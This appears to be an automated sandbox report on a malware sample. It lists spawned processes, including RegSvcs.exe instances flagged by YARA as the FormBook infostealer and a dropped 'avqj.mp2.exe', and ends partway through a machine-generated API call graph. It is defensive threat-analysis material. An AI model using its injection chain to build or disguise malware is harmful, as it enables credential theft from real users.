                                            Target ID:11
                                            Start time:10:19:17
                                            Start date:08/01/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:10:19:17
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                            Wow64 process (32bit):true
                                            Commandline:ipconfig /renew
                                            Imagebase:0xf30000
                                            File size:29'184 bytes
                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:10:19:24
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x8e0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:10:19:25
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x7ff6d64d0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            Has exited:false

                                            General

                                            Target ID:15
                                            Start time:10:19:32
                                            Start date:08/01/2025
                                            Path:C:\Users\user\ruum\avqj.mp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                                            Imagebase:0x720000
                                            File size:947'288 bytes
                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:10:19:41
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xc80000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:17
                                            Start time:10:19:41
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xe70000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:19
                                            Start time:10:19:45
                                            Start date:08/01/2025
                                            Path:C:\Users\user\ruum\avqj.mp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                                            Imagebase:0x720000
                                            File size:947'288 bytes
                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:20
                                            Start time:10:19:59
                                            Start date:08/01/2025
                                            Path:C:\Users\user\ruum\avqj.mp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                                            Imagebase:0x720000
                                            File size:947'288 bytes
                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:21
                                            Start time:10:20:23
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x5e0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:22
                                            Start time:10:20:25
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x730000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:9.7%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:11.1%
                                              Total number of Nodes:1902
                                              Total number of Limit Nodes:26
                                              execution_graph 27799 cb4cda 27800 cb4c88 27799->27800 27802 cb4fce 27800->27802 27828 cb4d2c 27802->27828 27804 cb4fde 27805 cb503b 27804->27805 27814 cb505f 27804->27814 27806 cb4f6c DloadReleaseSectionWriteAccess 8 API calls 27805->27806 27807 cb5046 RaiseException 27806->27807 27823 cb5234 27807->27823 27808 cb50d7 LoadLibraryExA 27809 cb50ea GetLastError 27808->27809 27810 cb5138 27808->27810 27816 cb50fd 27809->27816 27817 cb5113 27809->27817 27813 cb5143 FreeLibrary 27810->27813 27815 cb514a 27810->27815 27811 cb51a8 GetProcAddress 27812 cb5206 27811->27812 27819 cb51b8 GetLastError 27811->27819 27839 cb4f6c 27812->27839 27813->27815 27814->27808 27814->27810 27814->27812 27814->27815 27815->27811 27815->27812 27816->27810 27816->27817 27818 cb4f6c DloadReleaseSectionWriteAccess 8 API calls 27817->27818 27820 cb511e RaiseException 27818->27820 27821 cb51cb 27819->27821 27820->27823 27821->27812 27824 cb4f6c DloadReleaseSectionWriteAccess 8 API calls 27821->27824 27823->27800 27825 cb51ec RaiseException 27824->27825 27826 cb4d2c ___delayLoadHelper2@8 8 API calls 27825->27826 27827 cb5203 27826->27827 27827->27812 27829 cb4d38 27828->27829 27830 cb4d5e 27828->27830 27847 cb4dd5 27829->27847 27830->27804 27832 cb4d3d 27833 cb4d59 27832->27833 27852 cb4efe 27832->27852 27857 cb4d5f GetModuleHandleW GetProcAddress GetProcAddress 27833->27857 27836 cb4fa7 27837 cb4fc3 27836->27837 27838 cb4fbf RtlReleaseSRWLockExclusive 27836->27838 27837->27804 27838->27804 27840 cb4f7e 27839->27840 27841 cb4fa0 27839->27841 27842 cb4dd5 DloadReleaseSectionWriteAccess 4 API calls 27840->27842 27841->27823 27843 cb4f83 27842->27843 27844 cb4f9b 27843->27844 27845 cb4efe DloadProtectSection 3 API calls 27843->27845 27860 cb4fa2 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 27844->27860 27845->27844 27858 cb4d5f GetModuleHandleW GetProcAddress GetProcAddress 27847->27858 27849 cb4dda 27850 cb4df2 RtlAcquireSRWLockExclusive 27849->27850 27851 cb4df6 27849->27851 27850->27832 27851->27832 27853 cb4f13 DloadProtectSection 27852->27853 27854 cb4f19 27853->27854 27855 cb4f4e VirtualProtect 27853->27855 27859 cb4e14 VirtualQuery GetSystemInfo 27853->27859 27854->27833 27855->27854 27857->27836 27858->27849 27859->27855 27860->27841 27861 cb4b8a 27862 cb4b33 27861->27862 27862->27861 27863 cb4fce ___delayLoadHelper2@8 17 API calls 27862->27863 27863->27862 27864 cb437d 27865 cb4389 __EH_prolog3_GS 27864->27865 27882 ca4318 27865->27882 27871 cb43dc 27893 c91a66 27871->27893 27875 cb43f5 27900 cb0678 PeekMessageW 27875->27900 27881 cb4430 27906 cb5787 27881->27906 27883 ca4328 27882->27883 27909 ca4349 27883->27909 27886 ca6a25 27944 ca68d4 27886->27944 27889 c925a4 27890 c925b2 27889->27890 27891 c925ad 27889->27891 27890->27871 27892 c91a66 26 API calls 27891->27892 27892->27890 27894 c91a71 27893->27894 27895 c91a80 27893->27895 27896 c912a7 26 API calls 27894->27896 27897 c91de7 27895->27897 27896->27895 27898 c91df1 27897->27898 27899 c91df3 SetDlgItemTextW 27897->27899 27898->27899 27899->27875 27901 cb06cc 27900->27901 27902 cb0693 GetMessageW 27900->27902 27901->27881 27905 c919a9 26 API calls 27901->27905 27903 cb06a9 IsDialogMessageW 27902->27903 27904 cb06b8 TranslateMessage DispatchMessageW 27902->27904 27903->27901 27903->27904 27904->27901 27905->27881 27907 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27906->27907 27908 cb4446 27907->27908 27915 ca347b 27909->27915 27912 ca436c LoadStringW 27913 ca4346 27912->27913 27914 ca4383 LoadStringW 27912->27914 27913->27886 27914->27913 27922 ca338e 27915->27922 27918 ca34bc 27932 cb5734 27918->27932 27921 ca34d1 27921->27912 27921->27913 27923 ca33c2 27922->27923 27931 ca3445 _strncpy 27922->27931 27927 ca33e2 27923->27927 27940 ca89ed WideCharToMultiByte 27923->27940 27925 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27926 ca3474 27925->27926 27926->27918 27939 ca34d5 26 API calls 27926->27939 27930 ca3413 27927->27930 27941 ca42b2 50 API calls __vsnprintf 27927->27941 27942 cbd097 26 API calls 3 library calls 27930->27942 27931->27925 27933 cb573d IsProcessorFeaturePresent 27932->27933 27934 cb573c 27932->27934 27936 cb5bfc 27933->27936 27934->27921 27943 cb5bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27936->27943 27938 cb5cdf 27938->27921 27939->27918 27940->27927 27941->27930 27942->27931 27943->27938 27945 ca68e0 __EH_prolog3_GS 27944->27945 27959 ca663b 27945->27959 27950 ca6929 27951 ca696e 27950->27951 27972 ca6a3d 27950->27972 27975 c97ff0 28 API calls 27950->27975 27954 ca698e 27951->27954 27976 c97ff0 28 API calls 27951->27976 27953 cb5787 5 API calls 27955 ca69e8 27953->27955 27957 ca69d2 27954->27957 27977 c919a9 26 API calls 27954->27977 27955->27889 27957->27953 27960 ca66df 27959->27960 27961 ca6651 27959->27961 27963 c9adcc 27960->27963 27961->27960 27962 c91b63 28 API calls 27961->27962 27962->27961 27964 c9ae43 27963->27964 27968 c9addd 27963->27968 27985 c91a92 28 API calls std::_Xinvalid_argument 27964->27985 27966 c9ade8 27966->27950 27968->27966 27978 c912d3 28 API calls Concurrency::cancel_current_task 27968->27978 27970 c9ae17 27979 c911b8 27970->27979 28029 c9f68d 27972->28029 27975->27950 27976->27954 27977->27957 27978->27970 27980 c911cb 27979->27980 27981 c911c3 27979->27981 27983 c911c9 27980->27983 27986 cb56f6 27980->27986 28000 c911dd 27981->28000 27983->27966 27988 cb56fb 27986->27988 27989 cb5715 27988->27989 27991 cb5717 27988->27991 28009 cbd08c 27988->28009 28023 cbe91a 7 API calls 2 library calls 27988->28023 27989->27983 27992 c91a25 Concurrency::cancel_current_task 27991->27992 27994 cb5721 27991->27994 28016 cb734a 27992->28016 27995 cb734a _com_raise_error RaiseException 27994->27995 27996 cb6628 27995->27996 27997 c91a41 27998 c91a5a 27997->27998 28019 c912a7 27997->28019 27998->27983 28001 c911e8 28000->28001 28002 c91206 28000->28002 28003 cb56f6 28 API calls 28001->28003 28028 c91a25 27 API calls 2 library calls 28002->28028 28005 c911ee 28003->28005 28007 c911f5 28005->28007 28027 cbac9e 26 API calls _abort 28005->28027 28006 c9120b 28007->27983 28014 cc040e _abort 28009->28014 28010 cc044c 28025 cc01d3 20 API calls _free 28010->28025 28011 cc0437 RtlAllocateHeap 28013 cc044a 28011->28013 28011->28014 28013->27988 28014->28010 28014->28011 28024 cbe91a 7 API calls 2 library calls 28014->28024 28017 cb7391 RaiseException 28016->28017 28018 cb7364 28016->28018 28017->27997 28018->28017 28020 c912c1 28019->28020 28021 c912b4 28019->28021 28020->27998 28026 c919a9 26 API calls 28021->28026 28023->27988 28024->28014 28025->28013 28026->28020 28028->28006 28030 c9f6a4 __vsnwprintf_l 28029->28030 28033 cbcee1 28030->28033 28036 cbafa4 28033->28036 28037 cbafcc 28036->28037 28038 cbafe4 28036->28038 28053 cc01d3 20 API calls _free 28037->28053 28038->28037 28040 cbafec 28038->28040 28055 cbb543 38 API calls 2 library calls 28040->28055 28041 cbafd1 28054 cbac8e 26 API calls _abort 28041->28054 28044 cbaffc 28056 cbb50e 20 API calls 2 library calls 28044->28056 28045 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28048 c9f6ae 28045->28048 28047 cbb074 28057 cbb8f3 51 API calls 3 library calls 28047->28057 28048->27950 28051 cbafdc 28051->28045 28052 cbb07f 28058 cbb5c6 20 API calls _free 28052->28058 28053->28041 28054->28051 28055->28044 28056->28047 28057->28052 28058->28051 28059 cb2813 28081 c97673 28059->28081 28061 cb2af7 28136 c958cb 45 API calls 28061->28136 28062 c97673 28 API calls 28063 cb2aec 28062->28063 28085 cb38a0 28063->28085 28067 cb2832 _wcslen 28067->28061 28072 cb2a9a 28067->28072 28123 c9120c 28067->28123 28069 cb28fe 28132 ca645a 28 API calls 28069->28132 28071 cb2a01 28075 cb2a39 28071->28075 28134 c919a9 26 API calls 28071->28134 28072->28061 28072->28062 28075->28072 28135 c919a9 26 API calls 28075->28135 28076 c914a7 28 API calls 28079 cb292f 28076->28079 28077 c9adaa CompareStringW 28077->28079 28078 c91a66 26 API calls 28078->28079 28079->28071 28079->28076 28079->28077 28079->28078 28133 ca645a 28 API calls 28079->28133 28082 c9768c 28081->28082 28137 c97430 28082->28137 28084 c97699 28084->28067 28091 cb38ac __EH_prolog3_GS _abort 28085->28091 28086 c91a66 26 API calls 28087 cb3bcf 28086->28087 28088 cb5787 5 API calls 28087->28088 28089 cb3bd4 28088->28089 28089->28061 28090 cb3a1e 28148 c914a7 28090->28148 28091->28090 28105 cb3ba8 28091->28105 28161 ca8da4 CompareStringW 28091->28161 28097 c91a66 26 API calls 28098 cb3a4b 28097->28098 28099 cb3a9d ShellExecuteExW 28098->28099 28100 c914a7 28 API calls 28098->28100 28101 cb3b7c 28099->28101 28102 cb3ab2 28099->28102 28103 cb3a71 28100->28103 28101->28105 28164 c919a9 26 API calls 28101->28164 28106 cb3ace IsWindowVisible 28102->28106 28107 cb3ae5 WaitForInputIdle 28102->28107 28111 cb3b30 CloseHandle 28102->28111 28162 ca0e49 51 API calls 2 library calls 28103->28162 28105->28086 28106->28107 28112 cb3ad9 ShowWindow 28106->28112 28155 cb3fcf WaitForSingleObject 28107->28155 28109 cb3a82 28114 c91a66 26 API calls 28109->28114 28115 cb3b3d 28111->28115 28116 cb3b48 28111->28116 28112->28107 28113 cb3afb 28113->28111 28119 cb3b08 GetExitCodeProcess 28113->28119 28117 cb3a8e 28114->28117 28163 ca8da4 CompareStringW 28115->28163 28116->28101 28120 cb3b73 ShowWindow 28116->28120 28117->28099 28119->28111 28121 cb3b19 28119->28121 28120->28101 28121->28111 28124 c9127d 28123->28124 28127 c9121d 28123->28127 28263 c91a92 28 API calls std::_Xinvalid_argument 28124->28263 28131 c91228 28127->28131 28262 c912d3 28 API calls Concurrency::cancel_current_task 28127->28262 28129 c91254 28130 c911b8 28 API calls 28129->28130 28130->28131 28131->28069 28132->28079 28133->28079 28134->28075 28135->28072 28138 c97493 28137->28138 28140 c97441 28137->28140 28147 c91a92 28 API calls std::_Xinvalid_argument 28138->28147 28145 c9744c 28140->28145 28146 c912d3 28 API calls Concurrency::cancel_current_task 28140->28146 28143 c97471 28144 c911b8 28 API calls 28143->28144 28144->28145 28145->28084 28146->28143 28149 c914bd _wcslen 28148->28149 28150 c9120c 28 API calls 28149->28150 28151 c914ca 28150->28151 28152 c9ed0d 28151->28152 28165 c9ed1f 28152->28165 28156 cb3fea 28155->28156 28157 cb402f 28155->28157 28158 cb3fed PeekMessageW 28156->28158 28157->28113 28159 cb3fff GetMessageW TranslateMessage DispatchMessageW 28158->28159 28160 cb4020 WaitForSingleObject 28158->28160 28159->28160 28160->28157 28160->28158 28161->28090 28162->28109 28163->28116 28164->28105 28166 c9ed2b __EH_prolog3_GS 28165->28166 28167 c9ed38 GetFileAttributesW 28166->28167 28168 c9ed46 28167->28168 28175 c9edad 28167->28175 28177 ca169a 28168->28177 28169 cb5787 5 API calls 28171 c9ed16 28169->28171 28171->28097 28172 c9ed78 GetFileAttributesW 28174 c9ed81 28172->28174 28174->28175 28234 c919a9 26 API calls 28174->28234 28175->28169 28178 ca16e7 28177->28178 28192 ca16e0 28177->28192 28179 c914a7 28 API calls 28178->28179 28182 ca16f4 28179->28182 28180 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28181 c9ed68 28180->28181 28181->28172 28181->28174 28183 ca17db 28182->28183 28185 ca1711 28182->28185 28245 ca1309 28183->28245 28187 ca171b 28185->28187 28193 ca1741 28185->28193 28186 ca18ed 28196 ca1739 28186->28196 28258 c919a9 26 API calls 28186->28258 28235 ca0ba6 28 API calls 28187->28235 28189 c91a66 26 API calls 28189->28192 28190 ca1729 28195 c925a4 26 API calls 28190->28195 28191 ca17fb 28191->28186 28198 ca181f 28191->28198 28199 ca1875 28191->28199 28192->28180 28193->28196 28236 c9769f 28193->28236 28197 ca1731 28195->28197 28196->28189 28200 c91a66 26 API calls 28197->28200 28254 ca0c41 28 API calls 28198->28254 28256 ca0ba6 28 API calls 28199->28256 28200->28196 28202 ca1883 28205 c925a4 26 API calls 28202->28205 28208 ca188c 28205->28208 28206 ca1838 28255 c91188 28 API calls 28206->28255 28211 c91a66 26 API calls 28208->28211 28214 ca1894 28211->28214 28212 ca1848 28218 c925a4 26 API calls 28212->28218 28213 ca179e 28244 c9aef3 28 API calls 28213->28244 28257 ca0ddb 28 API calls 28214->28257 28217 ca17b2 28219 c925a4 26 API calls 28217->28219 28221 ca1860 28218->28221 28220 ca17be 28219->28220 28222 c91a66 26 API calls 28220->28222 28223 c91a66 26 API calls 28221->28223 28225 ca17c6 28222->28225 28227 ca1868 28223->28227 28224 c9769f 45 API calls 28231 ca1870 28224->28231 28228 c91a66 26 API calls 28225->28228 28226 ca189c 28226->28224 28229 c91a66 26 API calls 28227->28229 28230 ca17ce 28228->28230 28229->28231 28232 c91a66 26 API calls 28230->28232 28233 c91a66 26 API calls 28231->28233 28232->28196 28233->28186 28234->28175 28235->28190 28237 c976e1 28236->28237 28240 c976bb 28236->28240 28259 c958cb 45 API calls 28237->28259 28241 c9120c 28 API calls 28240->28241 28242 c976db 28241->28242 28243 ca0bf3 28 API calls _wcslen 28242->28243 28243->28213 28244->28217 28260 cb57a5 28245->28260 28247 ca1315 GetCurrentDirectoryW 28248 ca1327 28247->28248 28251 ca1323 28247->28251 28261 c91bbd 28 API calls 28248->28261 28250 ca1339 GetCurrentDirectoryW 28252 ca1356 _wcslen 28250->28252 28251->28191 28252->28251 28253 c912a7 26 API calls 28252->28253 28253->28251 28254->28206 28255->28212 28256->28202 28257->28226 28258->28196 28260->28247 28261->28250 28262->28129 28264 c9e0b0 28265 c9e0c9 28264->28265 28270 c9e850 28265->28270 28267 c9e0fb 28269 c9e850 111 API calls 28269->28267 28271 c9e862 28270->28271 28272 c9e875 28270->28272 28273 c9e0cd 28271->28273 28279 c99490 109 API calls 28271->28279 28272->28273 28274 c9e888 SetFilePointer 28272->28274 28273->28269 28274->28273 28276 c9e8a4 GetLastError 28274->28276 28276->28273 28277 c9e8ae 28276->28277 28277->28273 28280 c99490 109 API calls 28277->28280 28279->28272 28280->28273 28281 cb6452 28282 cb645e __FrameHandler3::FrameUnwindToState 28281->28282 28313 cb5e63 28282->28313 28284 cb6465 28285 cb65b8 28284->28285 28289 cb648f 28284->28289 28416 cb6878 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 28285->28416 28287 cb65bf 28409 cbee14 28287->28409 28301 cb64ce ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 28289->28301 28324 cbf9ad 28289->28324 28295 cb64ae 28297 cb652f 28332 cb6993 GetStartupInfoW _abort 28297->28332 28299 cb6535 28333 cbf8fe 51 API calls 28299->28333 28301->28297 28412 cbe9b0 38 API calls _abort 28301->28412 28302 cb653d 28334 cb454a 28302->28334 28307 cb6551 28307->28287 28308 cb6555 28307->28308 28309 cb655e 28308->28309 28414 cbedb7 28 API calls _abort 28308->28414 28415 cb5fd4 12 API calls ___scrt_uninitialize_crt 28309->28415 28312 cb6566 28312->28295 28314 cb5e6c 28313->28314 28418 cb6694 IsProcessorFeaturePresent 28314->28418 28316 cb5e78 28419 cb96d9 10 API calls 2 library calls 28316->28419 28318 cb5e7d 28323 cb5e81 28318->28323 28420 cbf837 28318->28420 28320 cb5e98 28320->28284 28323->28284 28325 cbf9c4 28324->28325 28326 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28325->28326 28327 cb64a8 28326->28327 28327->28295 28328 cbf951 28327->28328 28330 cbf980 28328->28330 28329 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28331 cbf9a9 28329->28331 28330->28329 28331->28301 28332->28299 28333->28302 28487 ca6d7b 28334->28487 28337 ca1309 30 API calls 28338 cb4572 28337->28338 28569 caf4d4 28338->28569 28340 cb457b _abort 28573 caf89a 28340->28573 28342 cb45fc 28582 caf84c 28342->28582 28344 cb4608 GetCommandLineW 28345 cb46f9 28344->28345 28346 cb4618 28344->28346 28347 ca13f9 29 API calls 28345->28347 28348 c914a7 28 API calls 28346->28348 28349 cb4703 28347->28349 28350 cb4622 28348->28350 28351 c925a4 26 API calls 28349->28351 28352 cb19ee 115 API calls 28350->28352 28353 cb4710 28351->28353 28354 cb462c 28352->28354 28355 c91a66 26 API calls 28353->28355 28356 c91a66 26 API calls 28354->28356 28357 cb4719 SetEnvironmentVariableW GetLocalTime 28355->28357 28358 cb4635 28356->28358 28362 c9f6ba _swprintf 51 API calls 28357->28362 28360 cb46dc 28358->28360 28361 cb4642 OpenFileMappingW 28358->28361 28363 c914a7 28 API calls 28360->28363 28364 cb465b MapViewOfFile 28361->28364 28365 cb46d2 CloseHandle 28361->28365 28366 cb477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 28362->28366 28367 cb46e6 28363->28367 28364->28365 28368 cb466b UnmapViewOfFile MapViewOfFile 28364->28368 28365->28345 28369 cb07e5 34 API calls 28366->28369 28370 cb3efc 30 API calls 28367->28370 28368->28365 28371 cb4689 28368->28371 28372 cb47bc 28369->28372 28373 cb46f0 28370->28373 28374 cafc38 28 API calls 28371->28374 28376 ca3538 133 API calls 28372->28376 28377 c91a66 26 API calls 28373->28377 28375 cb4699 28374->28375 28378 cb3efc 30 API calls 28375->28378 28379 cb47cc 28376->28379 28377->28345 28380 cb46a2 28378->28380 28381 cad255 28 API calls 28379->28381 28383 ca5109 114 API calls 28380->28383 28382 cb47d8 28381->28382 28384 cad255 28 API calls 28382->28384 28385 cb46b5 28383->28385 28386 cb47e1 DialogBoxParamW 28384->28386 28387 ca51bf 114 API calls 28385->28387 28388 cad347 26 API calls 28386->28388 28389 cb46c0 28387->28389 28390 cb481e 28388->28390 28392 cb46cb UnmapViewOfFile 28389->28392 28391 cad347 26 API calls 28390->28391 28393 cb482a 28391->28393 28392->28365 28394 cb483a 28393->28394 28395 cb4833 Sleep 28393->28395 28396 cb4848 28394->28396 28397 cafb4b 48 API calls 28394->28397 28395->28394 28398 cb4852 DeleteObject 28396->28398 28397->28396 28399 cb486e 28398->28399 28400 cb4867 DeleteObject 28398->28400 28401 cb489e 28399->28401 28402 cb48b0 28399->28402 28400->28399 28403 cb3fcf 6 API calls 28401->28403 28405 caf53a GdiplusShutdown CoUninitialize 28402->28405 28404 cb48a4 CloseHandle 28403->28404 28404->28402 28406 cb48ea 28405->28406 28407 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28406->28407 28408 cb48fd 28407->28408 28413 cb69c9 GetModuleHandleW 28408->28413 28673 cbeb91 28409->28673 28412->28297 28413->28307 28414->28309 28415->28312 28416->28287 28418->28316 28419->28318 28424 cc2d0a 28420->28424 28423 cb96f8 7 API calls 2 library calls 28423->28323 28427 cc2d27 28424->28427 28428 cc2d23 28424->28428 28425 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28426 cb5e8a 28425->28426 28426->28320 28426->28423 28427->28428 28430 cc1320 28427->28430 28428->28425 28431 cc132c __FrameHandler3::FrameUnwindToState 28430->28431 28442 cc18e1 EnterCriticalSection 28431->28442 28433 cc1333 28443 cc31d8 28433->28443 28435 cc1342 28441 cc1351 28435->28441 28456 cc11b0 29 API calls 28435->28456 28438 cc134c 28457 cc1266 GetStdHandle GetFileType 28438->28457 28439 cc1362 _abort 28439->28427 28458 cc136d LeaveCriticalSection _abort 28441->28458 28442->28433 28444 cc31e4 __FrameHandler3::FrameUnwindToState 28443->28444 28445 cc3208 28444->28445 28446 cc31f1 28444->28446 28459 cc18e1 EnterCriticalSection 28445->28459 28467 cc01d3 20 API calls _free 28446->28467 28449 cc31f6 28468 cbac8e 26 API calls _abort 28449->28468 28451 cc3200 _abort 28451->28435 28452 cc3240 28469 cc3267 LeaveCriticalSection _abort 28452->28469 28455 cc3214 28455->28452 28460 cc3129 28455->28460 28456->28438 28457->28441 28458->28439 28459->28455 28470 cc1de6 28460->28470 28462 cc313b 28466 cc3148 28462->28466 28483 cc1bba 11 API calls 2 library calls 28462->28483 28465 cc319a 28465->28455 28477 cc03d4 28466->28477 28467->28449 28468->28451 28469->28451 28475 cc1df3 _abort 28470->28475 28471 cc1e33 28485 cc01d3 20 API calls _free 28471->28485 28472 cc1e1e RtlAllocateHeap 28473 cc1e31 28472->28473 28472->28475 28473->28462 28475->28471 28475->28472 28484 cbe91a 7 API calls 2 library calls 28475->28484 28478 cc0408 _free 28477->28478 28479 cc03df RtlFreeHeap 28477->28479 28478->28465 28479->28478 28480 cc03f4 28479->28480 28486 cc01d3 20 API calls _free 28480->28486 28482 cc03fa GetLastError 28482->28478 28483->28462 28484->28475 28485->28473 28486->28482 28589 cb5b20 28487->28589 28490 ca6e28 28492 ca719b 28490->28492 28639 cbe50e 42 API calls __vsnwprintf_l 28490->28639 28491 ca6dd3 GetProcAddress 28493 ca6dfd GetProcAddress 28491->28493 28494 ca6de5 28491->28494 28591 ca13f9 28492->28591 28493->28490 28496 ca6e0f 28493->28496 28494->28493 28496->28490 28498 ca7098 28498->28492 28501 ca13f9 29 API calls 28498->28501 28499 ca71a6 28602 ca2117 28499->28602 28502 ca70ac 28501->28502 28503 ca70ba 28502->28503 28504 ca70bd CreateFileW 28502->28504 28503->28504 28506 ca70db SetFilePointer 28504->28506 28507 ca7186 CloseHandle 28504->28507 28506->28507 28508 ca70ed ReadFile 28506->28508 28509 c91a66 26 API calls 28507->28509 28508->28507 28510 ca7109 28508->28510 28511 ca7199 28509->28511 28514 ca711a 28510->28514 28515 ca73f2 28510->28515 28511->28492 28513 c914a7 28 API calls 28523 ca71ba 28513->28523 28517 c914a7 28 API calls 28514->28517 28642 cb5ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 28515->28642 28524 ca7133 28517->28524 28518 ca73f7 28519 ca71de CompareStringW 28519->28523 28521 c91a66 26 API calls 28521->28523 28523->28513 28523->28519 28523->28521 28525 c9ed1f 49 API calls 28523->28525 28538 ca7248 28523->28538 28606 ca067e 28523->28606 28611 ca6c5e 28523->28611 28635 ca229d 28523->28635 28526 ca7176 28524->28526 28530 ca6c5e 30 API calls 28524->28530 28640 ca6366 28 API calls 28524->28640 28525->28523 28529 c91a66 26 API calls 28526->28529 28527 ca729e 28641 ca2187 45 API calls 28527->28641 28528 ca73bd 28532 c91a66 26 API calls 28528->28532 28533 ca717e 28529->28533 28530->28524 28536 